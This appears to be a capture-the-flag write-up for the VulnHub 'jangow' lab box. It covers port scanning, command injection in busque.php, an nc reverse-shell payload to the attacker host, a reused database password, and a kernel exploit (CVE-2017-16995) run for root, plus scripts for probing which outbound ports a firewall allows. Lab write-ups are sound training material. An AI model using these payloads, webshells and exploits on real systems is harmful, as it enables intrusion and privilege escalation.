Port scanning

┌──(mikannse㉿kali)-[~]
└─$ sudo nmap --min-rate=10000 -p- 192.168.56.118
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 19:07 CST
Nmap scan report for jangow.hub (192.168.56.118)
Host is up (0.00043s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
MAC Address: 08:00:27:9F:53:41 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.40 seconds
┌──(mikannse㉿kali)-[~]
└─$ sudo nmap -sT -sC -sV -O -p21,80 192.168.56.118
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 19:08 CST
Nmap scan report for jangow.hub (192.168.56.118)
Host is up (0.00067s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2021-06-10 18:05 site/
|_
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Index of /
MAC Address: 08:00:27:9F:53:41 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.16 - 4.6 (97%), Linux 3.2 - 4.9 (97%), Linux 4.4 (97%), Linux 3.13 (94%), Linux 4.2 (94%), Linux 3.13 - 3.16 (91%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (91%), Linux 4.10 (91%), Linux 5.1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: 127.0.0.1; OS: Unix

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.45 seconds

Web

┌──(mikannse㉿kali)-[~/vulnhub/jangow]
└─$ feroxbuster -u http://jangow.hub/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x rar,php,zip,sql,txt,html,bak,pdf --filter-status 404 -k

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.4
───────────────────────────┬──────────────────────
🎯 Target Url │ http://jangow.hub/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
💢 Status Code Filters │ [404]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.4
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
💲 Extensions │ [rar, php, zip, sql, txt, html, bak, pdf]
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 272c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 28w 307c http://jangow.hub/site => http://jangow.hub/site/
200 GET 106l 659w 26989c http://jangow.hub/site/assets/img/demo-image-01.jpg
200 GET 54l 134w 1644c http://jangow.hub/site/js/scripts.js
200 GET 8l 29w 28898c http://jangow.hub/site/assets/favicon.ico
200 GET 679l 4637w 425261c http://jangow.hub/site/assets/img/ipad.png
200 GET 11253l 21663w 207746c http://jangow.hub/site/css/styles.css
200 GET 1l 0w 1c http://jangow.hub/site/busque.php
200 GET 949l 4824w 385662c http://jangow.hub/site/assets/img/bg-masthead.jpg
200 GET 492l 2733w 186437c http://jangow.hub/site/assets/img/demo-image-02.jpg
301 GET 9l 28w 314c http://jangow.hub/site/assets => http://jangow.hub/site/assets/
301 GET 9l 28w 311c http://jangow.hub/site/css => http://jangow.hub/site/css/
301 GET 9l 28w 317c http://jangow.hub/site/wordpress => http://jangow.hub/site/wordpress/
200 GET 173l 663w 10190c http://jangow.hub/site/index.html
200 GET 2608l 13994w 956051c http://jangow.hub/site/assets/img/bg-signup.jpg
301 GET 9l 28w 310c http://jangow.hub/site/js => http://jangow.hub/site/js/
200 GET 173l 663w 10190c http://jangow.hub/site/wordpress/index.html
200 GET 1l 10w 87c http://jangow.hub/site/wordpress/config.php

busque.php turns out to execute whatever is passed in its buscar parameter as a shell command, so use it to get a reverse shell. The URL-encoded payload below decodes to: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.56.131 443 >/tmp/f (the listener has to be on 443; the BeyondROOT section explains why).

http://jangow.hub/site/busque.php?buscar=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%20192.168.56.131%20443%20%3E%2Ftmp%2Ff

Privilege escalation

config.php contains database credentials, but the database cannot be connected to with them:

<?php
$servername = "localhost";
$database = "desafio02";
$username = "desafio02";
$password = "abygurl69";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
// Check connection
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
mysqli_close($conn);
?>

The same password, however, works for the local user jangow01:

www-data@jangow01:/var/www/html/site/wordpress$ su jangow01
su jangow01
Password: abygurl69

After further enumeration there is no other path, so try a kernel exploit. uname -a shows Ubuntu kernel 4.4.0-31, which is covered by Exploit-DB 45010 (CVE-2017-16995, the eBPF verifier bug): https://github.com/chacka0101/exploits/blob/master/45010.c

But the target cannot reach the web server started on the attacker box, so the usual wget/curl of the exploit source fails.

So drop a webshell, connect to it with AntSword (蚁剑) and upload the file through it: the upload rides on the inbound HTTP connection the target already accepts, which is why it works where outbound downloads do not. Compile and run the exploit on the target, and root is obtained:

www-data@jangow01:/tmp$ gcc 45010.c -o hack1
gcc 45010.c -o hack1
www-data@jangow01:/tmp$ chmod +x hack1
chmod +x hack1
www-data@jangow01:/tmp$ ./hack1
./hack1
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88003c4da300
[*] Leaking sock struct from ffff88003c11bc00
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880035073180
[*] UID from cred structure: 33, matches the current: 33
[*] hammering cred structure at ffff880035073180
[*] credentials patched, launching shell...
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
#

BeyondROOT

During the attack, the target could not reach most ports on the attacker host; the guess is an egress firewall policy. Look at the OUTPUT chain with iptables:

# iptables -L OUTPUT --line-numbers
iptables -L OUTPUT --line-numbers
Chain OUTPUT (policy DROP)
num target prot opt source destination
1 ufw-before-logging-output all -- anywhere anywhere
2 ufw-before-output all -- anywhere anywhere
3 ufw-after-output all -- anywhere anywhere
4 ufw-after-logging-output all -- anywhere anywhere
5 ufw-reject-output all -- anywhere anywhere
6 ufw-track-output all -- anywhere anywhere

The user-defined chain shows that the only permitted outbound traffic is to port 443 (https), tcp and udp, on top of a DROP default policy (the equivalent of ufw default deny outgoing plus ufw allow out 443). That is why the reverse-shell listener has to sit on 443:

# iptables -L ufw-user-output --line-numbers
iptables -L ufw-user-output --line-numbers
Chain ufw-user-output (1 references)
num target prot opt source destination
1 ACCEPT tcp -- anywhere anywhere tcp dpt:https
2 ACCEPT udp -- anywhere anywhere udp dpt:https

In a real engagement, one way to find out which outbound destination ports are allowed:

On the attacker machine, redirect every TCP port to a single listening port, so that whatever port the target tries, the connection lands on that listener (note that PREROUTING only affects packets from other hosts, but this will also hijack any remote SSH session to the attacker box, so do it from the console or exclude your admin port):

sudo iptables -A PREROUTING -t nat -p tcp --dport 1:65535 -j REDIRECT --to-port 6688

Then run the following bash script on the target; reachable ports are recorded in result.txt:

# attack_ip: the attacker host running the REDIRECT rule; 400-450 is just a sample range.
# nc -z only tests the connect; timeout 1 stops DROPped ports from hanging the loop.
for i in {400..450};
do
  timeout 1 nc -vz attack_ip "$i" && echo "$i allowed" >> result.txt || echo "$i refused" >> result.txt;
done
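The nc loop above assumes the target has nc, which a hardened box often lacks. The script below is an added example, not part of the original writeup: it does the same egress probe with bash's /dev/tcp, takes a port spec like "22,80,443,8000-8010", and reports only the ports that connect. The attacker-side commands in the comments are the REDIRECT rule above plus a listener on its port; the port list in the usage comment is an assumption about what typical egress policies leave open.

```bash
#!/usr/bin/env bash
# Added example: probe which outbound destination ports a firewalled host allows.
# Attacker side (not run here): redirect every TCP port to one listener, e.g.
#   sudo iptables -A PREROUTING -t nat -p tcp --dport 1:65535 -j REDIRECT --to-port 6688
#   nc -lvnp 6688
# Target side: run egress_scan against the attacker IP. It uses bash's /dev/tcp,
# so it works even when the target has no nc.

# Expand "22,80,443,8000-8010" into one port per line.
expand_ports() {
  local spec=$1 items item lo hi p
  IFS=',' read -ra items <<< "$spec"
  for item in "${items[@]}"; do
    case $item in
      *-*) lo=${item%-*}; hi=${item#*-}
           for (( p = lo; p <= hi; p++ )); do echo "$p"; done ;;
      *)   echo "$item" ;;
    esac
  done
}

# Return 0 if a TCP connection to host:port completes within $timeout seconds.
# A DROP policy shows up as a timeout, a closed or REJECTed port as an immediate
# failure; either way the port is treated as blocked.
probe_port() {
  local host=$1 port=$2 timeout=${3:-1}
  timeout "$timeout" bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null
}

# Print every port from the spec that the firewall lets through to $host.
egress_scan() {
  local host=$1 spec=$2 p
  for p in $(expand_ports "$spec"); do
    if probe_port "$host" "$p"; then
      echo "$p"
    fi
  done
  return 0
}

# Typical use on the target: a handful of ports egress policies commonly leave open
# (assumed list). Under a DROP policy each blocked port costs the full timeout,
# so keep the list short rather than sweeping 1-65535:
#   egress_scan ATTACK_IP "21,22,25,53,80,110,143,443,445,993,995,3389,8080,8443"
```

Because the attacker's REDIRECT rule makes every port answer, any port that egress_scan prints is one the target's firewall allows, not one the attacker happens to listen on.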

Also, the kernel exploit failed at first with a message that the number of cores must be at least two; presumably the exploit relies on a race condition, so when setting up the target VM give it 2 or more CPUs.

Rambling

Got stuck for a very long time because of the firewall; tried every way of transferring files and in the end settled on AntSword. And this is called an Easy-difficulty box???